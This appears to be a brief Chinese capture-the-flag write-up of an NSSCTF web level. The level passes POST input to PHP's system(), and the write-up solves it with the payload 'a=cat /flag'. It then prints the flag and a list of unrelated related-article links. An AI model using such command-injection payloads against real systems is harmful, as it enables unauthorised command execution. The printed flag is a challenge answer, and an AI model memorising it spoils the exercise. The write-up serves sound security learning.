开启靶场,打开链接:
这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST'a');
system() 函数会通过软连接执行你输入的系统命令
POST传参:a=cat /flag
成功得到flag:
NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}
相关推荐
BingoGo4 小时前
PHP 泛型之殇 泛型 RFC 提案被拒绝JaguarJack4 小时前
PHP 泛型之殇 泛型 RFC 提案被拒绝用户3074596982071 天前
PHP 扩展——从入门到理解鹏仔先生2 天前
拷贝漫画APP下载页PHP程序,后台带免费AI写作SM177152118382 天前
NSK紧凑型FA系列丝杠技术详解云水一下2 天前
从零开始学 PHP 系列(一):PHP 的前世今生与开发环境搭建treesforest2 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力xingpanvip2 天前
星盘接口开发文档:本命盘接口指南零零信安2 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领上海云盾第一敬业销售2 天前
深入解析WAF的工作原理与机制